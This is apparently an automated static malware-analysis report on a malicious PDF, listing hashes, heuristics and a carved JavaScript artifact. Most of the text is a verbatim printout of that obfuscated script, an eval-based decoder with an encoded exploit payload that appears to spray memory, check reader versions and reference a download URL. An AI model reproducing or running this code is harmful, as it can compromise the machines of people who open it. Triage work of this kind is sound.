Malicious PDF — malware analysis report

Static analysis result for SHA-256 a350a5aa74d7fea8…

MALICIOUS

PDF

7.6 KB Created: 2010-07-25 10:32:51 Authoring application: FPDF 1.6 First seen: 2026-05-10
MD5: 148dc9a2cb89238429bfd02cfb8936b9 SHA-1: 62c8e8d4d9e1400bc30aa1b7d1b89adea80b70c1 SHA-256: a350a5aa74d7fea8cb07387239760176054f26094481875d93a9e0b5274301a6
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, named javascript_obj0007_000.js, is obfuscated and likely intended to perform malicious actions such as downloading a second-stage payload. The PDF's metadata suggests it was created using FPDF, a common tool for generating PDFs, but the embedded script points to malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     function vf\(s\){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for\(z in n\){ for\(i=n[z][0];i<n[z][1];i++\){  v.push\(w\(i\)\); }}for \(var i = 0; i < s.length; i++\) { r+=v[s[i]];}eval\(r\);}vf\([65,64,71,86,79,68,85,74,80,79,0,70,79,8,71,66,86,12,0,88,68,81,69,9,92,65,64,88,73,74,77,70,0,8,71,66,86,14,77,70,79,72,85,73,0,10,0,50,0,60,0,88,68,81,69,9,92,65,64,71,66,86,0,11,61,0,71,66,86,59,65,64,94,65,64,71,66,86,0,61,0,71,66,86,14,84,86,67,84,85,83, …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1EB 6881 bytes
SHA-256: 603a432753a0341286cd9cbb6f64d5416d2815c082cbd4ce7a982ad8680fa8f4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function vf(s){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for(z in n){	for(i=n[z][0];i<n[z][1];i++){		v.push(w(i));	}}for (var i = 0; i < s.length; i++) {	r+=v[s[i]];}eval(r);}vf([65,64,71,86,79,68,85,74,80,79,0,70,79,8,71,66,86,12,0,88,68,81,69,9,92,65,64,88,73,74,77,70,0,8,71,66,86,14,77,70,79,72,85,73,0,10,0,50,0,60,0,88,68,81,69,9,92,65,64,71,66,86,0,11,61,0,71,66,86,59,65,64,94,65,64,71,66,86,0,61,0,71,66,86,14,84,86,67,84,85,83,74,79,72,8,48,12,0,88,68,81,69,15,50,9,59,65,64,83,70,85,86,83,79,0,71,66,86,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,88,66,8,9,92,65,64,87,66,83,0,80,78,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,76,78,90,81,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,2,9,65,64,87,66,83,0,75,79,91,0,61,0,76,78,90,81,0,11,0,80,78,59,65,64,87,66,83,0,90,91,88,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,2,9,59,65,64,87,66,83,0,86,90,81,83,0,61,0,50,48,59,65,64,87,66,83,0,80,87,68,0,61,0,86,90,81,83,0,11,0,75,79,91,14,77,70,79,72,85,73,59,65,64,88,73,74,77,70,0,8,90,91,88,14,77,70,79,72,85,73,0,60,0,80,87,68,9,92,65,64,90,91,88,0,11,61,0,90,91,88,59,65,64,94,65,64,87,66,83,0,69,73,0,61,0,90,91,88,14,84,86,67,84,85,83,74,79,72,8,48,12,0,80,87,68,9,59,65,64,87,66,83,0,87,76,0,61,0,90,91,88,14,84,86,67,84,85,83,74,79,72,8,48,12,0,90,91,88,14,77,70,79,72,85,73,13,80,87,68,9,59,65,64,88,73,74,77,70,0,8,87,76,14,77,70,79,72,85,73,11,80,87,68,0,60,0,48,89,52,48,48,48,48,9,92,65,64,87,76,0,61,0,87,76,0,11,0,87,76,0,11,0,69,73,59,65,64,94,65,64,87,66,83,0,80,75,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,71,80,83,0,8,87,66,83,0,84,82,0,61,0,48,59,0,84,82,0,60,0,49,52,48,48,59,0,84,82,11,11,9,92,65,64,80,75,42,84,82,44,0,61,0,87,76,0,11,0,75,79,91,59,65,64,94,65,64,87,66,83,0,69,86,0,61,0,49,50,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,59,65,64,86,85,74,77,14,81,83,74,79,85,71,8,2,5,52,53,48,48,48,71,2,12,0,69,86,9,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,88,81,8,9,92,65,64,87,66,83,0,71,66,74,67,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,80,75,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,87,66,83,0,89,69,79,83,0,61,0,48,89,48,68,48,68,48,68,48,68,59,65,64,87,66,83,0,77,66,81,84,0,61,0,48,89,52,48,48,48,48,48,59,65,64,87,66,83,0,69,91,0,61,0,71,66,74,67,14,77,70,79,72,85,73,0,10,0,50,59,65,64,87,66,83,0,88,68,81,69,0,61,0,77,66,81,84,0,13,0,8,69,91,11,48,89,51,56,9,59,65,64,87,66,83,0,71,66,86,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,57,48,57,48,5,86,57,48,57,48,2,9,59,65,64,71,66,86,0,61,0,70,79,8,71,66,86,12,0,88,68,81,69,9,59,65,64,87,66,83,0,84,80,70,81,0,61,0,8,89,69,79,83,0,13,0,48,89,52,48,48,48,48,48,9,15,77,66,81,84,59,65,64,71,80,83,0,8,87,66,83,0,78,72,0,61,0,48,59,0,78,72,0,60,0,84,80,70,81,59,0,78,72,11,11,9,92,65,64,80,75,42,78,72,44,0,61,0,71,66,86,0,11,0,71,66,74,67,59,65,64,94,65,64,87,66,83,0,87,88,76,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,68,48,68,5,86,48,68,48,68,2,9,59,65,64,88,73,74,77,70,0,8,87,88,76,14,77,70,79,72,85,73,0,60,0,52,52,57,53,50,9,92,65,64,87,88,76,0,11,61,0,87,88,76,59,65,64,94,65,64,85,73,74,84,14,68,80,77,77,66,67,34,85,80,83,70,0,61,0,18,80,77,77,66,67,14,68,80,77,77,70,68,85,20,78,66,74,77,24,79,71,80,8,92,84,86,67,75,58,0,2,2,12,78,84,72,58,0,87,88,76,94,9,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,91,74,69,8,9,92,65,64,74,71,0,8,66,81,81,14,69,80,68,14,18,80,77,77,66,67,14,72,70,85,24,68,80,79,9,92,65,64,87,66,83,0,84,88,88,87,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,87,66,83,0,84,77,80,77,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,91,66,67,74,0,61,0,84,77,80,77,14,77,70,79,72,85,73,0,10,0,50,59,65,64,87,66,83,0,88,68,81,69,0,61,0,48,89,52,48,48,48,48,48,0,13,0,8,91,66,67,74,0,11,0,48,89,51,56,9,59,65,64,87,66,83,0,71,66,86,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,57,48,57,48,5,86,57,48,57,48,2,9,59,65,64,71,66,86,0,61,0,70,79,8,71,66,86,12,0,88,68,81,69,9,59,65,64,87,66,83,0,91,89,0,61,0,8,48,89,48,68,48,68,48,68,48,68,0,13,0,48,89,52,48,48,48,48,48,9,0,15,0,48,89,52,48,48,48,48,48,59,65,64,71,80,83,0,8,87,66,83,0,87,71,0,61,0,48,59,0,87,71,0,60,0,91,89,59,0,87,71,0,11,11,0,9,92,65,64,84,88,88,87,42,87,71,44,0,61,0,71,66,86,0,11,0,84,77,80,77,59,65,64,94,65,64,87,66,83,0,90,66,79,0,61,0,86,79,70,84,68,66,81,70,8,2,5,48,57,2,9,59,65,64,88,73,74,77,70,0,8,90,66,79,14,77,70,79,72,85,73,0,60,0,48,89,52,48,48,48,9,92,65,64,90,66,79,0,11,61,0,90,66,79,59,65,64,94,65,64,90,66,79,0,61,0,2,29,14,2,0,11,0,90,66,79,59,65,64,66,81,81,14,69,80,68,14,18,80,77,77,66,67,14,72,70,85,24,68,80,79,8,90,66,79,9,59,65,64,94,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,80,88,78,76,8,9,92,65,64,87,66,83,0,77,67,83,89,0,61,0,66,81,81,14,87,74,70,88,70,83,77,67,83,89,14,85,80,34,85,83,74,79,72,8,9,59,65,64,77,67,83,89,0,61,0,77,67,83,89,14,83,70,81,77,66,68,70,8,15,43,19,15,72,12,7,7,9,59,65,64,87,66,83,0,91,87,70,85,0,61,0,79,70,88,0,16,83,83,66,90,8,77,67,83,89,14,68,73,66,83,16,85,8,48,9,12,0,77,67,83,89,14,68,73,66,83,16,85,8,49,9,12,0,77,67,83,89,14,68,73,66,83,16,85,8,50,9,9,59,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,61,61,0,56,9,0,6,6,0,8,91,87,70,85,42,49,44,0,61,61,0,48,9,0,93,93,0,8,91,87,70,85,42,49,44,0,61,61,0,49,0,6,6,0,91,87,70,85,42,50,44,0,60,0,51,9,9,92,65,64,88,66,8,9,59,65,64,94,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,60,0,56,9,0,93,93,0,8,91,87,70,85,42,48,44,0,61,61,0,56,0,6,6,0,91,87,70,85,42,49,44,0,60,0,50,0,6,6,0,91,87,70,85,42,50,44,0,60,0,50,9,9,92,65,64,88,81,8,9,59,65,64,94,65,64,74,71,0,8,8,91,87,70,85,42,48,44,0,60,0,57,9,0,93,93,0,8,91,87,70,85,42,48,44,0,61,61,0,57,0,6,6,0,91,87,70,85,42,49,44,0,60,0,49,9,9,92,65,64,91,74,69,8,9,59,65,64,94,65,64,94,65,64,65,64,66,81,81,14,66,77,70,83,85,8,7,85,70,84,85,49,50,51,7,9,59,65,64]);;